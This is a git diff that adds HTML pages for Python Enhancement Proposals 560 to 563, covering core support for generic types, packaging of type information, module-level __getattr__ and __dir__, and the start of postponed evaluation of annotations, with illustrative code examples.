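+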
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0559.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0560/index.html b/pep-0560/index.html
new file mode 100644
index 00000000000..8a9304f77f8
--- /dev/null
+++ b/pep-0560/index.html
@@ -0,0 +1,458 @@
+PEP 560 – Core support for typing module and generic types | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 560 – Core support for typing module and generic types

+
+
Author:
+
Ivan Levkivskyi <levkivskyi at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
03-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
09-Sep-2017, 14-Nov-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at the documentation for +__class_getitem__() and +__mro_entries__().

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Initially PEP 484 was designed in such a way that it would not introduce any changes to the core CPython interpreter. Now type hints and the typing module are extensively used by the community, e.g. PEP 526 and PEP 557 extend the usage of type hints, and the backport of typing on PyPI has 1M downloads/month. Therefore, this restriction can be removed. It is proposed to add two special methods __class_getitem__ and __mro_entries__ to the core CPython for better support of generic types.

+
+
+

Rationale

+

The restriction to not modify the core CPython interpreter led to some +design decisions that became questionable when the typing module started +to be widely used. There are three main points of concern: +performance of the typing module, metaclass conflicts, and the large +number of hacks currently used in typing.

+
+

Performance

+

The typing module is one of the heaviest and slowest modules in the standard library even with all the optimizations made. Mainly this is because subscripted generic types (see PEP 484 for the definition of terms used in this PEP) are class objects (see also [1]). There are three main ways in which the performance can be improved with the help of the proposed special methods:

+
    +
  • Creation of generic classes is slow since GenericMeta.__new__ is very slow; we will not need it anymore.
  • +
  • Very long method resolution orders (MROs) for generic classes will be +half as long; they are present because we duplicate the collections.abc +inheritance chain in typing.
  • +
  • Instantiation of generic classes will be faster (this is minor however).
  • +
+
+
+

Metaclass conflicts

+

All generic types are instances of GenericMeta, so if a user uses +a custom metaclass, then it is hard to make a corresponding class generic. +This is particularly hard for library classes that a user doesn’t control. +A workaround is to always mix-in GenericMeta:

+
class AdHocMeta(GenericMeta, LibraryMeta):
+    pass
+
+class UserClass(LibraryBase, Generic[T], metaclass=AdHocMeta):
+    ...
+
+
+

but this is not always practical or even possible. With the help of the +proposed special attributes the GenericMeta metaclass will not be needed.

+
+
+

Hacks and bugs that will be removed by this proposal

+
    +
  • _generic_new hack that exists because __init__ is not called on instances with a type differing from the type whose __new__ was called; e.g., C[int]().__class__ is C.
  • +
  • _next_in_mro speed hack will be not necessary since subscription will +not create new classes.
  • +
  • Ugly sys._getframe hack. This one is particularly nasty since it looks +like we can’t remove it without changes outside typing.
  • +
  • Currently generics do dangerous things with private ABC caches to fix large memory consumption that grows at least as O(N²), see [2]. This point is also important because it was recently proposed to re-implement ABCMeta in C.
  • +
  • Problems with sharing attributes between subscripted generics, +see [3]. The current solution already uses __getattr__ and __setattr__, +but it is still incomplete, and solving this without the current proposal +will be hard and will need __getattribute__.
  • +
  • _no_slots_copy hack, where we clean up the class dictionary on every +subscription thus allowing generics with __slots__.
  • +
  • General complexity of the typing module. The new proposal will not only allow removing the above-mentioned hacks/bugs, but also simplify the implementation, so that it will be easier to maintain.
  • +
+
+
+
+

Specification

+
+

__class_getitem__

+

The idea of __class_getitem__ is simple: it is an exact analog of __getitem__ with the exception that it is called on a class that defines it, not on its instances. This allows us to avoid GenericMeta.__getitem__ for things like Iterable[int]. __class_getitem__ is automatically a class method and does not require the @classmethod decorator (similar to __init_subclass__) and is inherited like normal attributes. For example:

+
class MyList:
+    def __getitem__(self, index):
+        return index + 1
+    def __class_getitem__(cls, item):
+        return f"{cls.__name__}[{item.__name__}]"
+
+class MyOtherList(MyList):
+    pass
+
+assert MyList()[0] == 1
+assert MyList[int] == "MyList[int]"
+
+assert MyOtherList()[0] == 1
+assert MyOtherList[int] == "MyOtherList[int]"
+
+
+

Note that this method is used as a fallback, so if a metaclass defines +__getitem__, then that will have the priority.

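A small sketch of that priority rule (illustrative, with hypothetical class names):

+class Meta(type):
+    def __getitem__(cls, item):
+        return "metaclass wins"
+
+class Example(metaclass=Meta):
+    def __class_getitem__(cls, item):
+        return "fallback"
+
+# Meta.__getitem__ takes priority over Example.__class_getitem__
+assert Example[int] == "metaclass wins"
+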
+
+
+

__mro_entries__

+

If an object that is not a class object appears in the tuple of bases of a class definition, then the method __mro_entries__ is searched for on it. If found, it is called with the original tuple of bases as an argument. The result of the call must be a tuple that is unpacked into the base classes in place of this object. (If the tuple is empty, the original bases are simply discarded.) If there is more than one object with __mro_entries__, then all of them are called with the same original tuple of bases. This step happens first in the process of creation of a class; all other steps, including checks for duplicate bases and MRO calculation, happen normally with the updated bases.

+

Using the method API instead of just an attribute is necessary to avoid +inconsistent MRO errors, and perform other manipulations that are currently +done by GenericMeta.__new__. The original bases are stored as +__orig_bases__ in the class namespace (currently this is also done by +the metaclass). For example:

+
class GenericAlias:
+    def __init__(self, origin, item):
+        self.origin = origin
+        self.item = item
+    def __mro_entries__(self, bases):
+        return (self.origin,)
+
+class NewList:
+    def __class_getitem__(cls, item):
+        return GenericAlias(cls, item)
+
+class Tokens(NewList[int]):
+    ...
+
+assert Tokens.__bases__ == (NewList,)
+assert Tokens.__orig_bases__ == (NewList[int],)
+assert Tokens.__mro__ == (Tokens, NewList, object)
+
+
+

Resolution using __mro_entries__ happens only in the bases of a class definition statement. In all other situations where a class object is expected, no such resolution will happen; this includes the isinstance and issubclass built-in functions.

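Continuing the GenericAlias/NewList example above (an illustrative sketch):

+alias = NewList[int]       # a GenericAlias instance, not a class
+
+class Tokens(alias):       # resolved via __mro_entries__ here
+    ...
+
+try:
+    isinstance([], alias)  # no resolution outside class statement bases
+except TypeError:
+    pass                   # alias is not a class object, so this raises
+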
+

NOTE: These two method names are reserved for use by the typing module +and the generic types machinery, and any other use is discouraged. +The reference implementation (with tests) can be found in [4], and +the proposal was originally posted and discussed on the typing tracker, +see [5].

+
+
+

Dynamic class creation and types.resolve_bases

+

type.__new__ will not perform any MRO entry resolution, so a direct call type('Tokens', (List[int],), {}) will fail. This is done for performance reasons and to minimize the number of implicit transformations. Instead, a helper function resolve_bases will be added to the types module to allow an explicit __mro_entries__ resolution in the context of dynamic class creation. Correspondingly, types.new_class will be updated to reflect the new class creation steps while maintaining backwards compatibility:

+
def new_class(name, bases=(), kwds=None, exec_body=None):
+    resolved_bases = resolve_bases(bases)  # This step is added
+    meta, ns, kwds = prepare_class(name, resolved_bases, kwds)
+    if exec_body is not None:
+        exec_body(ns)
+    ns['__orig_bases__'] = bases  # This step is added
+    return meta(name, resolved_bases, ns, **kwds)
+
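For example, again reusing the NewList sketch from above (illustrative only):

+import types
+
+alias = NewList[int]
+# type() performs no MRO entry resolution:
+#     type('Tokens', (alias,), {})   # would raise TypeError
+# while types.resolve_bases() and types.new_class() do:
+assert types.resolve_bases((alias,)) == (NewList,)
+Tokens = types.new_class('Tokens', (alias,))
+assert Tokens.__bases__ == (NewList,)
+assert Tokens.__orig_bases__ == (alias,)
+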
+
+
+
+

Using __class_getitem__ in C extensions

+

As mentioned above, __class_getitem__ is automatically a class method if defined in Python code. To define this method in a C extension, one should use the flags METH_O|METH_CLASS. For example, a simple way to make an extension class generic is to use a method that simply returns the original class object, thus fully erasing the type information at runtime, and deferring all checks to static type checkers only:

+
typedef struct {
+    PyObject_HEAD
+    /* ... your code ... */
+} SimpleGeneric;
+
+static PyObject *
+simple_class_getitem(PyObject *type, PyObject *item)
+{
+    Py_INCREF(type);
+    return type;
+}
+
+static PyMethodDef simple_generic_methods[] = {
+    {"__class_getitem__", simple_class_getitem, METH_O|METH_CLASS, NULL},
+    /* ... other methods ... */
+};
+
+PyTypeObject SimpleGeneric_Type = {
+    PyVarObject_HEAD_INIT(NULL, 0)
+    "SimpleGeneric",
+    sizeof(SimpleGeneric),
+    0,
+    .tp_flags = Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE,
+    .tp_methods = simple_generic_methods,
+};
+
+
+

Such a class can be used as a normal generic in Python type annotations (a corresponding stub file should be provided for static type checkers, see PEP 484 for details):

+
from simple_extension import SimpleGeneric
+from typing import TypeVar
+
+T = TypeVar('T')
+
+Alias = SimpleGeneric[str, T]
+class SubClass(SimpleGeneric[T, int]):
+    ...
+
+data: Alias[int]  # Works at runtime
+more_data: SubClass[str]  # Also works at runtime
+
+
+
+
+
+

Backwards compatibility and impact on users who don’t use typing

+

This proposal may break code that currently uses the names +__class_getitem__ and __mro_entries__. (But the language +reference explicitly reserves all undocumented dunder names, and +allows “breakage without warning”; see [6].)

+

This proposal will support almost complete backwards compatibility with +the current public generic types API; moreover the typing module is still +provisional. The only two exceptions are that currently +issubclass(List[int], List) returns True, while with this proposal it will +raise TypeError, and repr() of unsubscripted user-defined generics +cannot be tweaked and will coincide with repr() of normal (non-generic) +classes.

+

With the reference implementation I measured negligible performance effects +(under 1% on a micro-benchmark) for regular (non-generic) classes. At the same +time performance of generics is significantly improved:

+
    +
  • importlib.reload(typing) is up to 7x faster
  • +
  • Creation of user defined generic classes is up to 4x faster (on a +micro-benchmark with an empty body)
  • +
  • Instantiation of generic classes is up to 5x faster (on a micro-benchmark +with an empty __init__)
  • +
  • Other operations with generic types and instances (like method lookup and +isinstance() checks) are improved by around 10-20%
  • +
  • The only aspect that gets slower with the current proof of concept +implementation is the subscripted generics cache look-up. However it was +already very efficient, so this aspect gives negligible overall impact.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0560.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0561/index.html b/pep-0561/index.html
new file mode 100644
index 00000000000..e8c15fe6fa9
--- /dev/null
+++ b/pep-0561/index.html
@@ -0,0 +1,507 @@
+PEP 561 – Distributing and Packaging Type Information | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 561 – Distributing and Packaging Type Information

+
+
Author:
+
Ethan Smith <ethan at ethanhs.me>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging, Typing
+
Created:
+
09-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
10-Sep-2017, 12-Sep-2017, 06-Oct-2017, 26-Oct-2017, 12-Apr-2018
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Type information in libraries for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

PEP 484 introduced type hinting to Python, with goals of making typing +gradual and easy to adopt. Currently, typing information must be distributed +manually. This PEP provides a standardized means to leverage existing tooling +to package and distribute type information with minimal work and an ordering +for type checkers to resolve modules and collect this information for type +checking.

+
+
+

Rationale

+

Currently, package authors wish to distribute code that has inline type information. Additionally, maintainers would like to distribute stub files to keep Python 2 compatibility while using newer annotation syntax. However, there is no standard method to distribute packages with type information. Also, if one wished to ship stub files privately, the only method available would be setting MYPYPATH or the equivalent to manually point to stubs. If the package can be released publicly, it can be added to typeshed [1]. However, this does not scale and becomes a burden on the maintainers of typeshed. In addition, it ties bug fixes in stubs to releases of the tool using typeshed.

+

PEP 484 has a brief section on distributing typing information. In this +section +the PEP recommends using shared/typehints/pythonX.Y/ for +shipping stub files. However, manually adding a path to stub files for each +third party library does not scale. The simplest approach people have taken +is to add site-packages to their MYPYPATH, but this causes type +checkers to fail on packages that are highly dynamic (e.g. sqlalchemy +and Django).

+
+
+

Definition of Terms

+

The key words “MAY”, “MUST”, “SHOULD”, and “SHOULD NOT” are to be interpreted as described in RFC 2119.

+

“inline” - the types are part of the runtime code using PEP 526 and +PEP 3107 syntax (the filename ends in .py).

+

“stubs” - files containing only type information, empty of runtime code +(the filename ends in .pyi).

+

“Distributions” are the packaged files which are used to publish and distribute +a release. (PEP 426)

+

“Module” - a file containing Python runtime code or stubbed type information.

+

“Package” - a directory or directories that namespace Python modules. (Note the distinction between packages and distributions. While most distributions are named after the one package they install, some distributions install multiple packages.)

+
+
+

Specification

+

There are several motivations and methods of supporting typing in a package. +This PEP recognizes three types of packages that users of typing wish to +create:

+
    +
  1. The package maintainer would like to add type information inline.
  2. +
  3. The package maintainer would like to add type information via stubs.
  4. +
  5. A third party or package maintainer would like to share stub files for +a package, but the maintainer does not want to include them in the source +of the package.
  6. +
+

This PEP aims to support all three scenarios and make them simple to add to +packaging and deployment.

+

The two major parts of this specification are the packaging specifications +and the resolution order for resolving module type information. The type +checking spec is meant to replace the shared/typehints/pythonX.Y/ +spec of PEP 484.

+

New third party stub libraries SHOULD distribute stubs via the third party +packaging methods proposed in this PEP in place of being added to typeshed. +Typeshed will remain in use, but if maintainers are found, third party stubs +in typeshed MAY be split into their own package.

+
+

Packaging Type Information

+

In order to make packaging and distributing type information as simple and +easy as possible, packaging and distribution is done through existing +frameworks.

+

Package maintainers who wish to support type checking of their code MUST add +a marker file named py.typed to their package supporting typing. This marker applies +recursively: if a top-level package includes it, all its sub-packages MUST support +type checking as well. To have this file installed with the package, +maintainers can use existing packaging options such as package_data in +distutils, shown below.

+

Distutils option example:

+
setup(
+    ...,
+    package_data = {
+        'foopkg': ['py.typed'],
+    },
+    ...,
+    )
+
+
+

For namespace packages (see PEP 420), the py.typed file should be in the +submodules of the namespace, to avoid conflicts and for clarity.

+

This PEP does not support distributing typing information as part of +module-only distributions or single-file modules within namespace packages.

+

The single-file module should be refactored into a package +and indicate that the package supports typing as described +above.

+
+

Stub-only Packages

+

For package maintainers wishing to ship stub files containing all of their +type information, it is preferred that the *.pyi stubs are alongside the +corresponding *.py files. However, the stubs can also be put in a separate +package and distributed separately. Third parties can also find this method +useful if they wish to distribute stub files. The name of the stub package +MUST follow the scheme foopkg-stubs for type stubs for the package named +foopkg. Note that for stub-only packages adding a py.typed marker is not +needed since the name *-stubs is enough to indicate it is a source of typing +information.

+

Third parties seeking to distribute stub files are encouraged to contact the +maintainer of the package about distribution alongside the package. If the +maintainer does not wish to maintain or package stub files or type information +inline, then a third party stub-only package can be created.

+

In addition, stub-only distributions SHOULD indicate which version(s) +of the runtime package are supported by indicating the runtime distribution’s +version(s) through normal dependency data. For example, the +stub package flyingcircus-stubs can indicate the versions of the +runtime flyingcircus distribution it supports through install_requires +in distutils-based tools, or the equivalent in other packaging tools. Note that +in pip 9.0, if you update flyingcircus-stubs, it will update +flyingcircus. In pip 9.0, you can use the +--upgrade-strategy=only-if-needed flag. In pip 10.0 this is the default +behavior.

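A minimal sketch in the style of the setup() example above, for the hypothetical flyingcircus-stubs distribution (version numbers are illustrative):

+setup(
+    name='flyingcircus-stubs',
+    version='1.0',
+    # Declare which runtime distribution versions these stubs describe
+    install_requires=['flyingcircus>=1.0,<2.0'],
+    packages=['flyingcircus-stubs'],
+)
+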
+

For namespace packages (see PEP 420), stub-only packages should +use the -stubs suffix on only the root namespace package. +All stub-only namespace packages should omit __init__.pyi files. py.typed +marker files are not necessary for stub-only packages, but similarly +to packages with inline types, if used, they should be in submodules of the namespace to +avoid conflicts and for clarity.

+

For example, if pentagon and hexagon are separate distributions installing within the namespace package shapes.polygons, the corresponding types-only distributions should produce packages laid out as follows:

+
shapes-stubs
+└── polygons
+    └── pentagon
+        └── __init__.pyi
+
+shapes-stubs
+└── polygons
+    └── hexagon
+        └── __init__.pyi
+
+
+
+
+
+

Type Checker Module Resolution Order

+

The following is the order in which type checkers supporting this PEP SHOULD resolve modules containing type information (a path-level sketch follows the list):

+
    +
  1. Stubs or Python source manually put in the beginning of the path. Type +checkers SHOULD provide this to allow the user complete control of which +stubs to use, and to patch broken stubs/inline types from packages. +In mypy the $MYPYPATH environment variable can be used for this.
  2. +
  3. User code - the files the type checker is running on.
  4. +
  5. Stub packages - these packages SHOULD supersede any installed inline +package. They can be found at foopkg-stubs for package foopkg.
  6. +
  7. Packages with a py.typed marker file - if there is nothing overriding +the installed package, and it opts into type checking, the types +bundled with the package SHOULD be used (be they in .pyi type +stub files or inline in .py files).
  8. +
  9. Typeshed (if used) - Provides the stdlib types and several third party +libraries.
  10. +
+
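As a concrete path-level sketch of that order for a module foopkg.mod (the locations shown are hypothetical; real type checkers differ in details):

+# 1. $MYPYPATH/foopkg/mod.pyi            manual stubs/sources first
+# 2. ./foopkg/mod.py                     the user code being checked
+# 3. site-packages/foopkg-stubs/mod.pyi  stub package
+# 4. site-packages/foopkg/mod.pyi        py.typed package, with .pyi
+#    site-packages/foopkg/mod.py         checked before .py
+# 5. typeshed/.../foopkg/mod.pyi         typeshed, if used
+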

If type checkers identify a stub-only namespace package without the desired module in step 3, they should continue to step 4/5. Type checkers should identify namespace packages by the absence of __init__.pyi. This allows different subpackages to independently opt for inline vs stub-only.

+

Type checkers that check a different Python version than the version they run on MUST find the type information in the site-packages/dist-packages of that Python version. This can be queried with e.g. pythonX.Y -c 'import site; print(site.getsitepackages())'. It is also recommended that the type checker allow the user to point to a particular Python binary, in case it is not in the path.

+
+
+

Partial Stub Packages

+

Many stub packages will only have part of the type interface for libraries +completed, especially initially. For the benefit of type checking and code +editors, packages can be “partial”. This means modules not found in the stub +package SHOULD be searched for in parts four and five of the module resolution +order above, namely inline packages and typeshed.

+

Type checkers should merge the stub package and runtime package or typeshed +directories. This can be thought of as the functional equivalent of copying the +stub package into the same directory as the corresponding runtime package or +typeshed folder and type checking the combined directory structure. Thus type +checkers MUST maintain the normal resolution order of checking *.pyi before +*.py files.

+

If a stub package distribution is partial it MUST include partial\n in a +py.typed file. For stub-packages distributing within a namespace +package (see PEP 420), the py.typed file should be in the +submodules of the namespace.

+

Type checkers should treat namespace packages within stub-packages as +incomplete since multiple distributions may populate them. +Regular packages within namespace packages in stub-package distributions +are considered complete unless a py.typed with partial\n is included.

+
+
+
+

Implementation

+

The proposed scheme of indicating support for typing is completely backwards compatible, and requires no modification to package tooling. A sample package with inline types is available [typed_package], as well as a [stub_package]. A sample package checker [pkg_checker] reads the metadata of installed packages and reports on their status as either not typed, inline typed, or a stub package.

+

The mypy type checker has an implementation of PEP 561 searching which can be +read about in the mypy docs [4].

+

[numpy-stubs] is an example of a real stub-only package for the numpy +distribution.

+
+
+

Acknowledgements

+

This PEP would not have been possible without the ideas, feedback, and support +of Ivan Levkivskyi, Jelle Zijlstra, Alyssa Coghlan, Daniel F Moisset, Andrey +Vlasovskikh, Nathaniel Smith, and Guido van Rossum.

+
+
+

Version History

+
    +
  • 2023-01-13
    +
      +
    • Clarify that the 4th step of the Module Resolution Order applies +to any package with a py.typed marker file (and not just +inline packages).
    • +
    +
    +
  • +
  • 2021-09-20
    +
      +
    • Clarify expectations and typechecker behavior for stub-only namespace packages
    • +
    • Clarify handling of single-file modules within namespace packages.
    • +
    +
    +
  • +
  • 2018-07-09
    +
      +
    • Add links to sample stub-only packages
    • +
    +
    +
  • +
  • 2018-06-19
    +
      +
    • Partial stub packages can look at typeshed as well as runtime packages
    • +
    +
    +
  • +
  • 2018-05-15
    +
      +
    • Add partial stub package spec.
    • +
    +
    +
  • +
  • 2018-04-09
    +
      +
    • Add reference to mypy implementation
    • +
    • Clarify stub package priority.
    • +
    +
    +
  • +
  • 2018-02-02
    +
      +
    • Change stub-only package suffix to be -stubs not _stubs.
    • +
    • Note that py.typed is not needed for stub-only packages.
    • +
    • Add note about pip and upgrading stub packages.
    • +
    +
    +
  • +
  • 2017-11-12
    +
      +
    • Rewritten to use existing tooling only
    • +
    • No need to indicate kind of type information in metadata
    • +
    • Name of marker file changed from .typeinfo to py.typed
    • +
    +
    +
  • +
  • 2017-11-10
    +
      +
    • Specification re-written to use package metadata instead of distribution +metadata.
    • +
    • Removed stub-only packages and merged into third party packages spec.
    • +
    • Removed suggestion for typecheckers to consider checking runtime versions
    • +
    • Implementations updated to reflect PEP changes.
    • +
    +
    +
  • +
  • 2017-10-26
    +
      +
    • Added implementation references.
    • +
    • Added acknowledgements and version history.
    • +
    +
    +
  • +
  • 2017-10-06
    +
      +
    • Rewritten to use .distinfo/METADATA over a distutils specific command.
    • +
    • Clarify versioning of third party stub packages.
    • +
    +
    +
  • +
  • 2017-09-11
    +
      +
    • Added information about current solutions and typeshed.
    • +
    • Clarify rationale.
    • +
    +
    +
  • +
+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0561.rst

+

Last modified: 2024-06-05 15:44:49 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0562/index.html b/pep-0562/index.html
new file mode 100644
index 00000000000..e4aa9d8fe54
--- /dev/null
+++ b/pep-0562/index.html
@@ -0,0 +1,318 @@
+PEP 562 – Module __getattr__ and __dir__ | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 562 – Module __getattr__ and __dir__

+
+
Author:
+
Ivan Levkivskyi <levkivskyi at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
09-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
09-Sep-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Customizing Module Attribute Access.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

It is proposed to support __getattr__ and __dir__ functions defined on modules to provide basic customization of module attribute access.

+
+
+

Rationale

+

It is sometimes convenient to customize or otherwise have control over +access to module attributes. A typical example is managing deprecation +warnings. Typical workarounds are assigning __class__ of a module object +to a custom subclass of types.ModuleType or replacing the sys.modules +item with a custom wrapper instance. It would be convenient to simplify this +procedure by recognizing __getattr__ defined directly in a module that +would act like a normal __getattr__ method, except that it will be defined +on module instances. For example:

+
# lib.py
+
+from warnings import warn
+
+deprecated_names = ["old_function", ...]
+
+def _deprecated_old_function(arg, other):
+    ...
+
+def __getattr__(name):
+    if name in deprecated_names:
+        warn(f"{name} is deprecated", DeprecationWarning)
+        return globals()[f"_deprecated_{name}"]
+    raise AttributeError(f"module {__name__!r} has no attribute {name!r}")
+
+# main.py
+
+from lib import old_function  # Works, but emits the warning
+
+
+

Another widespread use case for __getattr__ would be lazy submodule +imports. Consider a simple example:

+
# lib/__init__.py
+
+import importlib
+
+__all__ = ['submod', ...]
+
+def __getattr__(name):
+    if name in __all__:
+        return importlib.import_module("." + name, __name__)
+    raise AttributeError(f"module {__name__!r} has no attribute {name!r}")
+
+# lib/submod.py
+
+print("Submodule loaded")
+class HeavyClass:
+    ...
+
+# main.py
+
+import lib
+lib.submod.HeavyClass  # prints "Submodule loaded"
+
+
+

There is a related proposal PEP 549 that proposes to support instance +properties for a similar functionality. The difference is this PEP proposes +a faster and simpler mechanism, but provides more basic customization. +An additional motivation for this proposal is that PEP 484 already defines +the use of module __getattr__ for this purpose in Python stub files, +see PEP 484.

+

In addition, to allow modifying the result of a dir() call on a module to show deprecated and other dynamically generated attributes, it is proposed to support a module level __dir__ function. For example:

+
# lib.py
+
+deprecated_names = ["old_function", ...]
+__all__ = ["new_function_one", "new_function_two", ...]
+
+def new_function_one(arg, other):
+   ...
+def new_function_two(arg, other):
+    ...
+
+def __dir__():
+    return sorted(__all__ + deprecated_names)
+
+# main.py
+
+import lib
+
+dir(lib)  # prints ["new_function_one", "new_function_two", "old_function", ...]
+
+
+
+
+

Specification

+

The __getattr__ function at the module level should accept one argument +which is the name of an attribute and return the computed value or raise +an AttributeError:

+
def __getattr__(name: str) -> Any: ...
+
+
+

If an attribute is not found on a module object through the normal lookup +(i.e. object.__getattribute__), then __getattr__ is searched in +the module __dict__ before raising an AttributeError. If found, it is +called with the attribute name and the result is returned. Looking up a name +as a module global will bypass module __getattr__. This is intentional, +otherwise calling __getattr__ for builtins will significantly harm +performance.

+
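
A minimal sketch of the bypass (hypothetical module code): attribute access on the module object goes through __getattr__, but a plain global lookup inside the same module does not.

+
# lib.py
+
+def __getattr__(name):
+    return f"generated: {name}"
+
+def demo():
+    import sys
+    print(sys.modules[__name__].missing)  # attribute access: calls __getattr__
+    try:
+        print(missing)  # plain global lookup: __getattr__ is bypassed
+    except NameError:
+        print("global lookup bypassed __getattr__")
+
+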

The __dir__ function should accept no arguments, and return a list of strings that represents the names accessible on the module:

+
def __dir__() -> List[str]: ...
+
+
+

If present, this function overrides the standard dir() search on +a module.

+

The reference implementation for this PEP can be found in [2].

+
+
+

Backwards compatibility and impact on performance

+

This PEP may break code that uses module level (global) names __getattr__ +and __dir__. (But the language reference explicitly reserves all +undocumented dunder names, and allows “breakage without warning”; see [3].) +The performance implications of this PEP are minimal, since __getattr__ +is called only for missing attributes.

+

Some tools that perform module attribute discovery might not expect __getattr__. This problem is not new, however, since it is already possible to replace a module with a module subclass with overridden __getattr__ and __dir__, but with this PEP such problems can occur more often.

+
+
+

Discussion

+

Note that the use of module __getattr__ requires care to keep the referenced objects pickleable. For example, the __name__ attribute of a function should correspond to the name with which it is accessible via __getattr__:

+
def keep_pickleable(func):
+    func.__name__ = func.__name__.replace('_deprecated_', '')
+    func.__qualname__ = func.__qualname__.replace('_deprecated_', '')
+    return func
+
+@keep_pickleable
+def _deprecated_old_function(arg, other):
+    ...
+
+
+

One should also be careful to avoid recursion, as one would with a class-level __getattr__.

+
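
For instance, a minimal sketch of the pitfall (hypothetical module code): looking the attribute up on the module object from inside __getattr__ re-enters it, while consulting globals() directly does not.

+
# lib.py
+
+def __getattr__(name):
+    # BAD: getattr(sys.modules[__name__], "_private_" + name) would call
+    # __getattr__ again for any missing name, recursing forever.
+    # GOOD: consult the module namespace directly instead.
+    try:
+        return globals()["_private_" + name]
+    except KeyError:
+        raise AttributeError(f"module {__name__!r} has no attribute {name!r}") from None
+
+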

To access a module global in a way that triggers __getattr__ (for example, if one wants to use a lazily loaded submodule), one can access it as:

+
sys.modules[__name__].some_global
+
+
+

or as:

+
from . import some_global
+
+
+

Note that the latter sets the module attribute, thus __getattr__ will be +called only once.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0562.rst

+

Last modified: 2024-10-31 21:24:44 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0563/index.html b/pep-0563/index.html new file mode 100644 index 00000000000..1fe36250c14 --- /dev/null +++ b/pep-0563/index.html @@ -0,0 +1,780 @@ + + + + + + + + PEP 563 – Postponed Evaluation of Annotations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 563 – Postponed Evaluation of Annotations

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
08-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
01-Nov-2017, 21-Nov-2017
+
Superseded-By:
+
649
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 3107 introduced syntax for function annotations, but the semantics +were deliberately left undefined. PEP 484 introduced a standard meaning +to annotations: type hints. PEP 526 defined variable annotations, +explicitly tying them with the type hinting use case.

+

This PEP proposes changing function annotations and variable annotations +so that they are no longer evaluated at function definition time. +Instead, they are preserved in __annotations__ in string form.

+

This change is being introduced gradually, starting with a +__future__ import in Python 3.7.

+
+
+

Rationale and Goals

+

PEP 3107 added support for arbitrary annotations on parts of a function +definition. Just like default values, annotations are evaluated at +function definition time. This creates a number of issues for the type +hinting use case:

+
    +
  • forward references: when a type hint contains names that have not been defined yet, that definition needs to be expressed as a string literal (see the sketch after this list);
  • +
  • type hints are executed at module import time, which is not +computationally free.
  • +
+
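
A short sketch of the first problem (hypothetical classes): a name used before its definition must be quoted, while a name that is already bound need not be.

+
class A:
+    def friend(self) -> "B":  # B is not defined yet: a string literal is required
+        ...
+
+class B:
+    def friend(self) -> A:    # A is already defined: no quoting needed
+        ...
+
+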

Postponing the evaluation of annotations solves both problems. +NOTE: PEP 649 proposes an alternative solution to the above issues, +putting this PEP in danger of being superseded.

+
+

Non-goals

+

Just like in PEP 484 and PEP 526, it should be emphasized that Python +will remain a dynamically typed language, and the authors have no desire +to ever make type hints mandatory, even by convention.

+

This PEP is meant to solve the problem of forward references in type +annotations. There are still cases outside of annotations where +forward references will require usage of string literals. Those are +listed in a later section of this document.

+

Annotations without forced evaluation enable opportunities to improve +the syntax of type hints. This idea will require its own separate PEP +and is not discussed further in this document.

+
+
+

Non-typing usage of annotations

+

While annotations are still available for arbitrary use besides type +checking, it is worth mentioning that the design of this PEP, as well +as its precursors (PEP 484 and PEP 526), is predominantly motivated by +the type hinting use case.

+

In Python 3.8 PEP 484 will graduate from provisional status. Other +enhancements to the Python programming language like PEP 544, PEP 557, +or PEP 560, are already being built on this basis as they depend on +type annotations and the typing module as defined by PEP 484. +In fact, the reason PEP 484 is staying provisional in Python 3.7 is to +enable rapid evolution for another release cycle that some of the +aforementioned enhancements require.

+

With this in mind, uses for annotations incompatible with the +aforementioned PEPs should be considered deprecated.

+
+
+
+

Implementation

+

With this PEP, function and variable annotations will no longer be +evaluated at definition time. Instead, a string form will be preserved +in the respective __annotations__ dictionary. Static type checkers +will see no difference in behavior, whereas tools using annotations at +runtime will have to perform postponed evaluation.

+

The string form is obtained from the AST during the compilation step, +which means that the string form might not preserve the exact formatting +of the source. Note: if an annotation was a string literal already, it +will still be wrapped in a string.

+
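
A small sketch of both effects, assuming the __future__ import described below:

+
from __future__ import annotations
+
+def f(x:     int, y: "int") -> None: ...
+
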